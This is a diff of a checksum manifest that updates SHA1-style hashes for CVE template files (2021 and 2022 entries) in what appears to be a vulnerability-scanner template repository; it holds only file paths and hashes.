http/cves/2021/CVE-2021-25298.yaml:3bdaa13b713bbb10748332fc35f8d91d0c4e156f http/cves/2021/CVE-2021-25299.yaml:acba2a33e97b6e1dfa0b411e0174bc05824010a8 http/cves/2021/CVE-2021-25646.yaml:38bddfd4767c88b7a9adef79e7dd77f2b6b497ff http/cves/2021/CVE-2021-25864.yaml:ef18020f6293591d6d4a6cca295555777777b889 -http/cves/2021/CVE-2021-25899.yaml:e7603dd4df43ead58e24ef91e4e0f610250ca419 +http/cves/2021/CVE-2021-25899.yaml:86aca8598bebed9c7dd77651d19412db231b32fe http/cves/2021/CVE-2021-26084.yaml:116be72a0be50b6b02223d4aeb391b360e85d957 http/cves/2021/CVE-2021-26085.yaml:c4f194b24fac2b1847d554e44375f3f8c5c41aef http/cves/2021/CVE-2021-26086.yaml:ecc9c439b0d73d2386dce1692e5066fa9a48807a @@ -2486,11 +2486,11 @@ http/cves/2021/CVE-2021-27124.yaml:c5733fec98010b27de00dee5c3b7a7dbc1c5ae3d http/cves/2021/CVE-2021-27132.yaml:fcfd3632c51f9fc6add57cb17f22c786e429bc9f http/cves/2021/CVE-2021-27309.yaml:c0a0e164a992636c4d75f5c5a48093382a4a0861 http/cves/2021/CVE-2021-27310.yaml:36c147786b7124bac2e19cbc486d42f15381201e -http/cves/2021/CVE-2021-27314.yaml:5a5d404050557c21d88703fe905484af36df4d1c -http/cves/2021/CVE-2021-27315.yaml:a35e2b21d64664b1dc1b051b9aebe2c0d8bbea9a -http/cves/2021/CVE-2021-27316.yaml:75fe1ce09716aeebd01d4e93523b46c13ac35002 -http/cves/2021/CVE-2021-27319.yaml:b785025398590a56aed4ddf2ded77eb580bf4c39 -http/cves/2021/CVE-2021-27320.yaml:4316c2de8def2bfa92ed880cfcee4a994e548b67 +http/cves/2021/CVE-2021-27314.yaml:65e7241c27a722d6fed099975491cad8dfd9b567 +http/cves/2021/CVE-2021-27315.yaml:e40da2dcf1bf6bf3a795b11dd7d55b2c0d01b726 +http/cves/2021/CVE-2021-27316.yaml:92959d0c7d3b2ea4e27fc8e91cc023b96a22618d +http/cves/2021/CVE-2021-27319.yaml:651b709fd8521c1e7ecbc38387ccd11cf335ee1d +http/cves/2021/CVE-2021-27320.yaml:92257945114c514284ec0b874c790967abfbe89e http/cves/2021/CVE-2021-27330.yaml:b3cbfe9873da2920ead577ece056ac018736d8bd http/cves/2021/CVE-2021-27358.yaml:fd6de06bd7e7ca34585598ffee4fbe08fe755adc http/cves/2021/CVE-2021-27519.yaml:e2aae4f809456fa60fb3ed1302a1cfe80155d822 @@ -2535,7 +2535,7 @@ http/cves/2021/CVE-2021-3019.yaml:f07c8e5cc5ec9b7ae1b7cb57a35a7cb17281bacf http/cves/2021/CVE-2021-30213.yaml:d78b5aba3bec5186aac1eadbcab658a2ab1d4fdb http/cves/2021/CVE-2021-30461.yaml:e4679016cb9207726026dbaddbfb2cb655a17fa9 http/cves/2021/CVE-2021-30497.yaml:475c233386c5ba0e18abcfdc0e304105c6a8a2e7 -http/cves/2021/CVE-2021-3110.yaml:70a3a1b4da525f3cc12c8e320828c1de7787d711 +http/cves/2021/CVE-2021-3110.yaml:a05cf23a2c7535c010b6ec4220ff52aadf92df55 http/cves/2021/CVE-2021-31195.yaml:9f9874e28b1438005fcb47686a747d31ea708ff5 http/cves/2021/CVE-2021-31249.yaml:514a2d8097e60e15ab5d5dea64714e8293db2b3a http/cves/2021/CVE-2021-31250.yaml:867864379eb75c9a81f7e05fb7b7919af58517e4 @@ -2621,7 +2621,7 @@ http/cves/2021/CVE-2021-39141.yaml:658ae606eefaee8e5ed50c513aff80caa008aa2f http/cves/2021/CVE-2021-39144.yaml:df10799e1ee8eb495557350715a2105e62845151 http/cves/2021/CVE-2021-39146.yaml:6ced53b90254c74c5a35b67d00c776c1aae0e1d3 http/cves/2021/CVE-2021-39152.yaml:ccbd9449525555e79a34a562ceee2264622470dd -http/cves/2021/CVE-2021-39165.yaml:6419221bc8e9061109110a33579381c4108f53a9 +http/cves/2021/CVE-2021-39165.yaml:7c2bc8f912952c7191819685fb5d4dc152e2a175 http/cves/2021/CVE-2021-39211.yaml:4d7f0b468d404e83a4f7317b87ba0e1b0b79265f http/cves/2021/CVE-2021-39226.yaml:d59d4b479bf607b76bc705a325473543be39d0cc http/cves/2021/CVE-2021-39312.yaml:eea2b37fd676c4075a9b388b8f27a51308c86f2e @@ -2760,17 +2760,17 @@ http/cves/2022/CVE-2022-0208.yaml:f94f8e7a05eda6a691d54be067aec88feac62a92 http/cves/2022/CVE-2022-0212.yaml:cd4f5f85b3a6879d1848a351c1eb1a23468aaa72 http/cves/2022/CVE-2022-0218.yaml:cfb01741cc062e2e759d4c0d6990be3702aa7ea1 http/cves/2022/CVE-2022-0220.yaml:45fd4591a3188ad2de66e9889440195f237a7708 -http/cves/2022/CVE-2022-0228.yaml:9636036c629860bf5619215f63fc2a76cab63df5 +http/cves/2022/CVE-2022-0228.yaml:31d3285c23514e5e8798849e4d4c20ab740d6a58 http/cves/2022/CVE-2022-0234.yaml:28adef5f0da5150793b2b58515a733b094122c01 http/cves/2022/CVE-2022-0271.yaml:cdc3a2ab11aaa4169d5cb198ce6a5cbc9a9fed07 http/cves/2022/CVE-2022-0281.yaml:935722b805fe2a72d8f1e9ca8d9ec148e533444e http/cves/2022/CVE-2022-0288.yaml:bded7808021892901eeb0ca82eaa4d323e5d8e9d http/cves/2022/CVE-2022-0342.yaml:7d9b743140c09258a2e65ee299c20555a66ed9c5 http/cves/2022/CVE-2022-0346.yaml:222700feb32d0e6514e9bb0380c883ce6f8ad6d6 -http/cves/2022/CVE-2022-0349.yaml:800ce9d18fc4a8c58d309ca4e50610a2c1143114 +http/cves/2022/CVE-2022-0349.yaml:272235e20cfa8f1bfe401ca88938f1fef348befa http/cves/2022/CVE-2022-0378.yaml:d4c120ebccae805643e4427b232ab2e4e6bae52f http/cves/2022/CVE-2022-0381.yaml:b821360648152293494d1151973961c9b1163d7b -http/cves/2022/CVE-2022-0412.yaml:c50a4e2c407b2a259e239ad64d58ae537570b780 +http/cves/2022/CVE-2022-0412.yaml:62f6f04a4b954bf73f656fd68b17aaa0ccfef22c http/cves/2022/CVE-2022-0415.yaml:3f2cdd16342de9ed4797110d0ed137ac1e20b198 http/cves/2022/CVE-2022-0422.yaml:6269517eaa64f536ddf2367ac408b436a6fed3a4 http/cves/2022/CVE-2022-0424.yaml:60b61ece343cc6daf9643770e67f6301d7a27e62 @@ -2787,53 +2787,53 @@ http/cves/2022/CVE-2022-0594.yaml:0557f5bdd81dd3c1ed4d6e070eb23303b24f16d9 http/cves/2022/CVE-2022-0595.yaml:c93f58fb37203da06c1bb160f7fe787f08440db7 http/cves/2022/CVE-2022-0597.yaml:1dcd0234a7f11d7940285990eafc29cfb83dee22 http/cves/2022/CVE-2022-0599.yaml:396f247c7262420516ea089cfc09a748dbc1803b -http/cves/2022/CVE-2022-0651.yaml:9b622f9e759e05d8c9521ae71c0676428ae9e73e +http/cves/2022/CVE-2022-0651.yaml:d871b37a7547398df934fd977078fe7592ddb3a8 http/cves/2022/CVE-2022-0653.yaml:52274e93b6ea8926e170293dce796d792a5e0a48 http/cves/2022/CVE-2022-0656.yaml:2975cb24c367f2e0bf11b3a966529591c8ed2edf -http/cves/2022/CVE-2022-0658.yaml:2b1f5971384f81ffce9e3a8427555bbd01b3b3a5 +http/cves/2022/CVE-2022-0658.yaml:0c39756bb19b63266aca6c440273f2d2dce844b3 http/cves/2022/CVE-2022-0660.yaml:5cefecafbb1fef808077f2b13c5c822464b08bba http/cves/2022/CVE-2022-0666.yaml:f35aba5d1ea0f47545df48b5d38583af105c03e2 http/cves/2022/CVE-2022-0678.yaml:37317c402940aecb5fb7da3c07c31b46e74fddc2 http/cves/2022/CVE-2022-0679.yaml:bb862b57bb18b1832313bed2c8f3095286ab5f0b http/cves/2022/CVE-2022-0692.yaml:16bb78665f4c62b041bf0641d2afe49587c40472 -http/cves/2022/CVE-2022-0693.yaml:2aecdcd6ffe92ccba0d03350a27308e1da93c8cd +http/cves/2022/CVE-2022-0693.yaml:244109a038db0ec3d6bd224ec5ada97d571d4083 http/cves/2022/CVE-2022-0735.yaml:dd2f5d391d251438be1a2abefefa74ce70856c09 -http/cves/2022/CVE-2022-0747.yaml:890b432df0ad9e435385331f6c2eb688bb5a005e -http/cves/2022/CVE-2022-0760.yaml:6cb4a03a430f9731eb6888abbb95be407f48dd01 -http/cves/2022/CVE-2022-0769.yaml:fa9f8927a0ec479b990f84398ae6d6682c8765ab -http/cves/2022/CVE-2022-0773.yaml:60911205f06d37439f55025d19e56f3cdef9f67c +http/cves/2022/CVE-2022-0747.yaml:82641cb6f0bcff12953073d3a0906a882e0ec59f +http/cves/2022/CVE-2022-0760.yaml:f0dc0bc75c8fb62eb90cb54034884d0d73e3094c +http/cves/2022/CVE-2022-0769.yaml:32203885eaf63f2571708e4c33d25101f4281342 +http/cves/2022/CVE-2022-0773.yaml:9500e013421bb32ba789cb22154a4bbd9afabbed http/cves/2022/CVE-2022-0776.yaml:7bd96bf74cec15da9b768dfd9e67a731a594c545 http/cves/2022/CVE-2022-0781.yaml:c75712f70574a0f093bc6832e5fc779121ac49cf -http/cves/2022/CVE-2022-0784.yaml:339ca31d50774616a5f566cb81ab5bd55e46a59b -http/cves/2022/CVE-2022-0785.yaml:995b733b646a5a2bc60dff4fa14455d00cbf92fa -http/cves/2022/CVE-2022-0786.yaml:d3061ccf83938bb17391061d42e6ad26e1054133 -http/cves/2022/CVE-2022-0787.yaml:770ac3ab82af6c50987b53eea627cfde6ee48366 -http/cves/2022/CVE-2022-0788.yaml:5d60f92d349f7fecefec325a40f08d6970a98a99 +http/cves/2022/CVE-2022-0784.yaml:df78da4472001c178e5229eec6a533bbeb642c3f +http/cves/2022/CVE-2022-0785.yaml:b36c932ed02d274039a066902b8420891fd91802 +http/cves/2022/CVE-2022-0786.yaml:b89a093c47317510835a1769ee919b09ab3fdb7c +http/cves/2022/CVE-2022-0787.yaml:fd335f04363e18e5b4a11e4df8e1073c0a58f35f +http/cves/2022/CVE-2022-0788.yaml:bb1dc151bb6fbd0313cf71fb3dadbce8aec90977 http/cves/2022/CVE-2022-0814.yaml:b9d91c9b6d0d5785a892ae9e0b8ca7ebbb0f2dbf http/cves/2022/CVE-2022-0817.yaml:3d97d0fc13055df8d7452acbf7103cbed7eb24cc http/cves/2022/CVE-2022-0824.yaml:0c81c3a3ec7279bb619a1e0ddc46dd2fe2463ad7 -http/cves/2022/CVE-2022-0826.yaml:932c997f120a08b809ae12ee795ce06e81b21e5c -http/cves/2022/CVE-2022-0827.yaml:0004c15fb0ac347037597f5d71d7800cf097e84a -http/cves/2022/CVE-2022-0846.yaml:19baadca475a5807aaafef134a6e7399ab75ec51 +http/cves/2022/CVE-2022-0826.yaml:95c0ccb376999c7365e31ca999e0efab19f3ebfc +http/cves/2022/CVE-2022-0827.yaml:11cb1c4b800ddf7eaffcb46eb0151e1ffbd5a55a +http/cves/2022/CVE-2022-0846.yaml:d41522a19fd41d99a176548b7aa9c918c6cc731b http/cves/2022/CVE-2022-0864.yaml:f2dfdb584ab501f690ba9ef1aee6ecc88f0ae7f7 -http/cves/2022/CVE-2022-0867.yaml:6e863875d948eb2710e1bd9f80b30a8a4a84e1ce +http/cves/2022/CVE-2022-0867.yaml:dbb87a2d0806344e451647bf9234f48d8963bfc2 http/cves/2022/CVE-2022-0869.yaml:ffdda923697da8dad00a7821ca970cb742cc05db http/cves/2022/CVE-2022-0870.yaml:cbeb8dcb281a3fbc9896cdfe7b37289141aa29fc http/cves/2022/CVE-2022-0885.yaml:c2feed9203594bc300df9489d7c31d78990df69e http/cves/2022/CVE-2022-0899.yaml:c733b3141b9bef1f5c43da49ef612ab4659ecb5b http/cves/2022/CVE-2022-0928.yaml:dfac7757ef4d05a0f3c9843c41c58fca483fe86b -http/cves/2022/CVE-2022-0948.yaml:d81bdba80c595c26ed421d5ac4697749a26423d5 -http/cves/2022/CVE-2022-0949.yaml:cecc462fb3fa010b12cac54c2901675f7105f609 +http/cves/2022/CVE-2022-0948.yaml:69f813260c724a1ae6a989c159bbf2acc4268421 +http/cves/2022/CVE-2022-0949.yaml:394084273dce2664cb9e2e4b61430b298d3ec644 http/cves/2022/CVE-2022-0952.yaml:7e2d47b7c6fed59342471c942cb0707a354d59ed http/cves/2022/CVE-2022-0954.yaml:20cc4cf2b6d0f9943544ae7d8b1e3a7a20807baf http/cves/2022/CVE-2022-0963.yaml:db952641f0f7712be5f85322a20a0e283b421b3e http/cves/2022/CVE-2022-0968.yaml:541d06aad7e2c066cd29757c2365365c5323bb33 http/cves/2022/CVE-2022-1007.yaml:7fa894f5f894592900a2009b1c61500f729c9f9e -http/cves/2022/CVE-2022-1013.yaml:e28846ed928a45764a457f62019d3981ba035a9f +http/cves/2022/CVE-2022-1013.yaml:164bac6384b86d80095cee80ae7f41b996b55227 http/cves/2022/CVE-2022-1020.yaml:59af3f4fbbadc5897088c95b708c639991dc15e6 http/cves/2022/CVE-2022-1040.yaml:b065c7247839e5ede9e0b982bfe3230b614b5683 http/cves/2022/CVE-2022-1054.yaml:c935bda6318e2aa45761fcbbb8a16799993f77b0 -http/cves/2022/CVE-2022-1057.yaml:d10ec405daf09748e2cee57619a8ce228f851d08 +http/cves/2022/CVE-2022-1057.yaml:bac3e356ea7d71d80555a94cfae3534c2865bd27 http/cves/2022/CVE-2022-1058.yaml:0f157eef4b195e250d160eff5224506ffeec94a7 http/cves/2022/CVE-2022-1119.yaml:afa8d79a86918b793e22a3a43b81a6cc9b3fc21b http/cves/2022/CVE-2022-1162.yaml:f0b4b793eaaf4cba149bc7f44074fc60853e459b @@ -2858,9 +2858,9 @@ http/cves/2022/CVE-2022-1609.yaml:4706a752c4d8f1a7e19dbd54c998ecd9f8be2fc3 http/cves/2022/CVE-2022-1713.yaml:f78798785ec23797bc7fe65ab6d1077922bf6e23 http/cves/2022/CVE-2022-1724.yaml:dbe726a443d793b8fe24bbb03ea54a4b576c54da http/cves/2022/CVE-2022-1756.yaml:607ca0f657c94420a4e7247e16552c386449a2f0 -http/cves/2022/CVE-2022-1768.yaml:b858d3fecec81416d5abb5cfea90245ddac0aed5 +http/cves/2022/CVE-2022-1768.yaml:40d93b1a68e1ffe0927213d0944e3ea483780a16 http/cves/2022/CVE-2022-1815.yaml:ac7f9eeb321b7e05e2e334280f8262e381a1b250 -http/cves/2022/CVE-2022-1883.yaml:6ac1f2d3640c404680bd6323f6634cc8ab1d5865 +http/cves/2022/CVE-2022-1883.yaml:9ee48502858fb10f2bd0bb37f094be8d4703ed40 http/cves/2022/CVE-2022-1903.yaml:2a124e2da9fa4d26fbba2f834a5ffae2d3ae02a4 http/cves/2022/CVE-2022-1904.yaml:8364554cac977f888ab267875d02bbf1f2cb924b http/cves/2022/CVE-2022-1906.yaml:c1761a91f2bfedbfb9deaeb3b0159f9780ec76b7 @@ -2883,7 +2883,7 @@ http/cves/2022/CVE-2022-2219.yaml:f682b76185ee7e4b14c791de3f406e1200a1873e http/cves/2022/CVE-2022-22242.yaml:5ba8e944ff85f24ce27e54f2ed971fe77d29c0ed http/cves/2022/CVE-2022-22536.yaml:c9a773a1cb114cbc0732fc3d816ceb77f4ef383e http/cves/2022/CVE-2022-22733.yaml:5ec717eb729ca3bfb9bf3dc1ad1e60d1ae6ffba6 -http/cves/2022/CVE-2022-22897.yaml:21f8f34ee59ef373ddede014686cd47649976984 +http/cves/2022/CVE-2022-22897.yaml:e689c0d5e99bf3278416531089bdd9f118e71145 http/cves/2022/CVE-2022-2290.yaml:969dc774e02e9796b5c5c058809b241124b640a3 http/cves/2022/CVE-2022-22947.yaml:8c8ebad1b68f62dc0b84b4265274461ac3403869 http/cves/2022/CVE-2022-22954.yaml:e7fb1f8aa8ef4dbe1fa04588b921bbbc4ad4c281 @@ -2913,17 +2913,17 @@ http/cves/2022/CVE-2022-24124.yaml:82de06e9f6e642c86ef823150d31a42faa1c7c4e http/cves/2022/CVE-2022-24129.yaml:e9b5d1244a8f2dea948ea4cfb46b3756f0292aea http/cves/2022/CVE-2022-2414.yaml:d559122da4e0e54a6a39e22f752ee6b87f70d7bf http/cves/2022/CVE-2022-24181.yaml:d9b654f458b1fe808d099eaf47195b55abe20526 -http/cves/2022/CVE-2022-24223.yaml:e43e51025ee47293e25236bcf774b68055693f09 +http/cves/2022/CVE-2022-24223.yaml:42ad8d7b88898da39005adb6a315095bb6e9fff5 http/cves/2022/CVE-2022-24260.yaml:f3be11d2cb24b6e53f9bff7bce8f9951ff857259 http/cves/2022/CVE-2022-24264.yaml:f5bc5a683d015e5b3111f644577bf5338f50c6a9 -http/cves/2022/CVE-2022-24265.yaml:9ae194e777ddc72784b2b00c2e213855c49dc51f -http/cves/2022/CVE-2022-24266.yaml:3772b91a1d4fdf4737e1982a1aa90ecef93b1405 +http/cves/2022/CVE-2022-24265.yaml:73eba8809bf64a4c2b80d9f1973af25e74802cfe +http/cves/2022/CVE-2022-24266.yaml:2106c4eeaad8ea689c1d9f528337edb840056457 http/cves/2022/CVE-2022-24288.yaml:4f46dc359ae6a15765b97d2e9482503f3e97a1c0 http/cves/2022/CVE-2022-24384.yaml:d364e37fe1a6d0b49e54946fdce374f77c6d9ea7 http/cves/2022/CVE-2022-2462.yaml:d2c5333d5fa413506eb96c503830d3fd4f666a25 http/cves/2022/CVE-2022-24627.yaml:d86ec875353347f030d40e8219decd823837ef23 http/cves/2022/CVE-2022-24637.yaml:1779ea730c2c514b09290a92319e3a091fdeb5fd -http/cves/2022/CVE-2022-2467.yaml:8c177232bacaa6d592aac6d3c5eafd606aa45d4f +http/cves/2022/CVE-2022-2467.yaml:5e26f155d33cdd9d55565a2136117494b7488123 http/cves/2022/CVE-2022-24681.yaml:6d33adc92d4e456c03eeb117cc7f98a3cb5d5bed http/cves/2022/CVE-2022-24716.yaml:f2c42bcae7beadf49fb93ec39b7251e37d6183d4 http/cves/2022/CVE-2022-24816.yaml:008aaaa504f4bd2da14c154960d7bacff8281052 @@ -2936,8 +2936,8 @@ http/cves/2022/CVE-2022-24900.yaml:6408c7f70a1123ce24193c8be69e9236722b12d5 http/cves/2022/CVE-2022-24990.yaml:6e3eca39480cafde411d2c3ef5fbe5baa692832e http/cves/2022/CVE-2022-25082.yaml:143b63153860154b55a9e91bdbbc7e2d8a14632d http/cves/2022/CVE-2022-25125.yaml:5c3d111b0db3c5989a103b01d6825726115882a7 -http/cves/2022/CVE-2022-25148.yaml:7ec5fcfd06ced0b6a5f508e26766194b4ae64d1b -http/cves/2022/CVE-2022-25149.yaml:8124daa537d0014aaedf2f007bfccd2fc35b79bb +http/cves/2022/CVE-2022-25148.yaml:678152c1cc40685d23d3fd25ff5275b0c0cffb8c +http/cves/2022/CVE-2022-25149.yaml:a2b6e393120293f26edcadb4200d73686269c1ce http/cves/2022/CVE-2022-25216.yaml:03c2baa605bdc0bc564d817d8c49c2713a66210e http/cves/2022/CVE-2022-25323.yaml:60ff0b67a5e038f70308a439445e7da6e33ac607 http/cves/2022/CVE-2022-2535.yaml:1d55d98ce173ef06f58a8cf1a5f1c2a1817dcdb4 @@ -2974,9 +2974,9 @@ http/cves/2022/CVE-2022-27593.yaml:148edb32eaa88b10e1c6028cae4a2bca2a5c5a57 http/cves/2022/CVE-2022-27849.yaml:97aa8073fe3a8568903eb3a71c29bd8d85b791eb http/cves/2022/CVE-2022-27926.yaml:0abf3a04244788da9daecb9ec8a96b0d337677bc http/cves/2022/CVE-2022-27927.yaml:bea706f327a28583fb9c8db4058f93da20e9d66e -http/cves/2022/CVE-2022-27984.yaml:4b1de62b597ff3985b35f4c07f808e20b8e3be75 +http/cves/2022/CVE-2022-27984.yaml:5627d75f7e439b88ebdc0c69e57b43109a1ce9ac http/cves/2022/CVE-2022-27985.yaml:7de01fef2fe8a799a34cbfa788042f1cbc888287 -http/cves/2022/CVE-2022-28032.yaml:ccb20f87bc6749ecd44f76b965233728b440aafc +http/cves/2022/CVE-2022-28032.yaml:858963a5dca5e07432c7c8261ffedfcab37244de http/cves/2022/CVE-2022-28079.yaml:94a540cee17e3e49ec31c9e828d5ea1c5bdce435 http/cves/2022/CVE-2022-28080.yaml:b0b5afd63a37bec422bfff70a98268b8c051c55c http/cves/2022/CVE-2022-28117.yaml:8db307831c5623c38b79ce199be4310355ea9fb1 @@ -3021,9 +3021,9 @@ http/cves/2022/CVE-2022-31268.yaml:ecbacb22f4b8dacedd90a0cf530fadf1e5728e23 http/cves/2022/CVE-2022-31269.yaml:97f5463ade182b7e38609ca4ecee6b5e225f5408 http/cves/2022/CVE-2022-31299.yaml:83e0fce7d1de1b228595ffa36be5d64ee8aef870 http/cves/2022/CVE-2022-31373.yaml:516aeaded54bc1c8e341245e8eb1ba5888f6bfe4 -http/cves/2022/CVE-2022-3142.yaml:8238b5f11da14fbc677d59f77c5ede0eb4c119b6 +http/cves/2022/CVE-2022-3142.yaml:02e22a0babd1b1f842e052ab6bbdf7e75aa68643 http/cves/2022/CVE-2022-31474.yaml:ea47cd03d542d4c58da04a90b5803dfd9f2997e2 -http/cves/2022/CVE-2022-31499.yaml:7336edf5e9e7fb4de44620a43d44e7c5e10b6875 +http/cves/2022/CVE-2022-31499.yaml:b642c4b01882b761ad61f385ff8046af8d3d04c6 http/cves/2022/CVE-2022-31656.yaml:7878149bec1de85224faca256c8f2ab264910eab http/cves/2022/CVE-2022-31798.yaml:ab96c6fe92540cc08a9f6becaae81d96d7086b6d http/cves/2022/CVE-2022-31814.yaml:118097ce6da0a7e663d4890d0e8b786af80c65fe @@ -3033,9 +3033,9 @@ http/cves/2022/CVE-2022-31847.yaml:da369cafe875e0fc818b4606871854c77f11511b http/cves/2022/CVE-2022-31854.yaml:365c4ced58a37e3d0f041bab452270ada3fc3a3a http/cves/2022/CVE-2022-31974.yaml:6711ff86f730445184c93c2a91a32daf2af56723 http/cves/2022/CVE-2022-31975.yaml:1d80466a8bfedc02bacb9b870793a036d0769a40 -http/cves/2022/CVE-2022-31976.yaml:e6c75f79cbfb04defaea59a859cfbda40ba39dc4 -http/cves/2022/CVE-2022-31977.yaml:b04acc6c53b519736e32ef4d124affae024160eb -http/cves/2022/CVE-2022-31978.yaml:d082ccb6e5136465a070be3119ace6a2d590bf98 +http/cves/2022/CVE-2022-31976.yaml:6ca7ce68827876f8995b5079ea4ae5f7f51013fb +http/cves/2022/CVE-2022-31977.yaml:fb2a8ab0e5eab1668b58d28cbde79983d85d0146 +http/cves/2022/CVE-2022-31978.yaml:31cd6df73514eee51fc5e6482d1162aa28c26536 http/cves/2022/CVE-2022-31984.yaml:b6dabf331f1f42e3dfb65cf34469dabc48c5cdb5 http/cves/2022/CVE-2022-32007.yaml:e906645b18647cd54049b516c600dcb45757027f http/cves/2022/CVE-2022-32015.yaml:dfa56cfa49faf125c0eb6a8658b2e4edb2dce48e @@ -3059,7 +3059,7 @@ http/cves/2022/CVE-2022-33119.yaml:18032268085b0eb3b5ea4924c908a4f969146db3 http/cves/2022/CVE-2022-33174.yaml:45e958568134a9140a920d11a7ee6a5f45349217 http/cves/2022/CVE-2022-33891.yaml:bd5e63e0d14bae639a59b73501625964d68dc3af http/cves/2022/CVE-2022-33901.yaml:fa27ea080559ed96840da6b82a590142f01096ec -http/cves/2022/CVE-2022-33965.yaml:a695a45b7cb1756279de1a2e31cf893d9dfe333c +http/cves/2022/CVE-2022-33965.yaml:9f4ea95789d966466c3db3f95618e5ff3ddb01fd http/cves/2022/CVE-2022-34045.yaml:4343214ad608a8bca66eb41725f14126a70d482f http/cves/2022/CVE-2022-34046.yaml:1e5ce68d8c918b2d9b4779edc79ed55c9723502a http/cves/2022/CVE-2022-34047.yaml:f2aa7e2943c9d21b62b53d16bf71e5b3044f9ec5 @@ -3095,8 +3095,8 @@ http/cves/2022/CVE-2022-37153.yaml:cdc45f66feef7319c4587fa1dffba8487e27a691 http/cves/2022/CVE-2022-37190.yaml:a299ef58e490ff88c6c34e29fc02f2de7c2f2ef2 http/cves/2022/CVE-2022-37191.yaml:0c57a701c1c9067c702ef5d40ca23448a58f6709 http/cves/2022/CVE-2022-37299.yaml:0a3f30c80ce167733cb1a4432f2090d7d8715a62 -http/cves/2022/CVE-2022-3768.yaml:8c9f9736507f827359a08f4f70e83cfa05cd3e2a -http/cves/2022/CVE-2022-3800.yaml:a700c9264ffbedb46a2f3a22ec7e98be500097c5 +http/cves/2022/CVE-2022-3768.yaml:088deae309c004116cfddc985b0b362b949f7b43 +http/cves/2022/CVE-2022-3800.yaml:f5d304355c5a5b7c7d6b1713e6ac06edbf510d91 http/cves/2022/CVE-2022-38131.yaml:1e719c6442482728943b66e3a5efc442d34ce265 http/cves/2022/CVE-2022-38295.yaml:e935234c93f236f44ebedc6ec81801116b26d54b http/cves/2022/CVE-2022-38296.yaml:236c15b302eedb112d21bc64a388b0d716416755 @@ -3120,15 +3120,15 @@ http/cves/2022/CVE-2022-39952.yaml:cf194c8f311427424901178f2298c0da51409f3d http/cves/2022/CVE-2022-39960.yaml:1e72216affc3f0956d3cd701fb326796baf6a4f9 http/cves/2022/CVE-2022-39986.yaml:92d7db86d01d2771b7880f9c440feb8e62b94de2 http/cves/2022/CVE-2022-40022.yaml:64a838eb51b5a1c34c5b17e74f1fe233cbcc24ae -http/cves/2022/CVE-2022-40032.yaml:457b3c849fc450b8c4f39efc48b93f39e9a2c9ab +http/cves/2022/CVE-2022-40032.yaml:b68c724cca458e57a9c3171acce37b76d90debec http/cves/2022/CVE-2022-40047.yaml:2931bef5361cf87ba2274ccc6090dde8328e2440 http/cves/2022/CVE-2022-40083.yaml:333acecbc6c71ec844ded8fbdc5e2de95af9e34e http/cves/2022/CVE-2022-40127.yaml:1c30549f833d342dd280fd26686b3181fb9af4f1 http/cves/2022/CVE-2022-40359.yaml:ddd501f8d916d909938c17ccf6492dc2e2c7d812 -http/cves/2022/CVE-2022-4049.yaml:d7c394adacea8c5bf098022a9d2d86aca9fc5caf -http/cves/2022/CVE-2022-4050.yaml:054b17311703abba376a3fceb0279ec9e86bbb01 +http/cves/2022/CVE-2022-4049.yaml:d6a9707d9e04a4829dee1de89e97cf132534ddb0 +http/cves/2022/CVE-2022-4050.yaml:4619b6f41a027a42791f94a4cb12ed2244a4d014 http/cves/2022/CVE-2022-4057.yaml:f9ed01b5d367fe19da6614416acba1eb86ff9fff -http/cves/2022/CVE-2022-4059.yaml:1770b6465e74d136837d297e5e2702bd1798dd4d +http/cves/2022/CVE-2022-4059.yaml:21e029141a3c684b0ea5ac4569dbefb4ccef60b2 http/cves/2022/CVE-2022-4060.yaml:4564f0fd4f8ed6221de40ce6673f81c2c9453e8c http/cves/2022/CVE-2022-4063.yaml:4fc58e6992b32c1e2e2a0d1c78934dfb336aa6d5 http/cves/2022/CVE-2022-40684.yaml:9f201c8f2b14b43cff542ef33691c0622eabc992 @@ -3136,7 +3136,7 @@ http/cves/2022/CVE-2022-40734.yaml:5cc77b9ffdaa6feccc3286403f9038b56c2a0905 http/cves/2022/CVE-2022-40843.yaml:6b26b625e95244fe922bfcf60035ca2c72221ce2 http/cves/2022/CVE-2022-40879.yaml:e89d1e513a230e2184265c0d52d19ca99e6157d9 http/cves/2022/CVE-2022-40881.yaml:818fdd9b2d0d190ad80722e09c6fb16e2a26d681 -http/cves/2022/CVE-2022-4117.yaml:fe7d6f31f507cea2d5488b3e8b113b5ee72aac31 +http/cves/2022/CVE-2022-4117.yaml:4f47dc07ca2c094e45df5b797db9e258443e4e51 http/cves/2022/CVE-2022-4140.yaml:f243423772b8b2e9cfb6a9a3d8e4bbbbab68b2c9 http/cves/2022/CVE-2022-41412.yaml:a184237c60df53a8b29f094a9551efc5fc53dd89 http/cves/2022/CVE-2022-41441.yaml:9cd99a5235e843a62ee0d2e0d8fdd40f573f8265 @@ -3173,8 +3173,8 @@ http/cves/2022/CVE-2022-4321.yaml:83e456c1812d8c7529ac7680165f1558cb4cd635 http/cves/2022/CVE-2022-4325.yaml:f186020c216cd067428f78142dc9637ac51c3ec8 http/cves/2022/CVE-2022-4328.yaml:027d49a96bd49b38b06c63fe56e85df269c0af27 http/cves/2022/CVE-2022-43769.yaml:d42efbde4131de0b9bd35f085ab823bc970d4ff0 -http/cves/2022/CVE-2022-44290.yaml:c1846eb89065149403e96318b7de144c6fa807a9 -http/cves/2022/CVE-2022-44291.yaml:50e4b9fef3f63a6f1166f23761c05ecea1412bbb +http/cves/2022/CVE-2022-44290.yaml:c5daea5b6c9dad21f5e71d4eca36eefbdd4077b1 +http/cves/2022/CVE-2022-44291.yaml:f05c19072b0a6feeebfc986ba59de87331dbb357 http/cves/2022/CVE-2022-4447.yaml:9a4bef58f543b34699e05028a6b018ccf8ed7271 http/cves/2022/CVE-2022-44877.yaml:53d1b3d5c18d3c726bc960e7833e346c910dc34b http/cves/2022/CVE-2022-44944.yaml:aaf6c8b3626d68166be90ae794610aa2a51c475a @@ -3192,7 +3192,7 @@ http/cves/2022/CVE-2022-45269.yaml:917d3565d19ef490508b45c7370fe78855755525 http/cves/2022/CVE-2022-45354.yaml:e3388e631771c460f4ce83eab6279d2497c2e190 http/cves/2022/CVE-2022-45362.yaml:ade84fe7804fdef6dfb1718899ac3b1917cfc679 http/cves/2022/CVE-2022-45365.yaml:f637eb5c57aab39ea572b90b5f0c5519f06e8ed1 -http/cves/2022/CVE-2022-45805.yaml:a049af1b44e8af0e4df790d0ddc6396f07f0187a +http/cves/2022/CVE-2022-45805.yaml:66deac8599e9b870b9d61ee71a8d82be1cc03ee1 http/cves/2022/CVE-2022-45835.yaml:8a081814557b79edf22a83bfb0a827771088704b 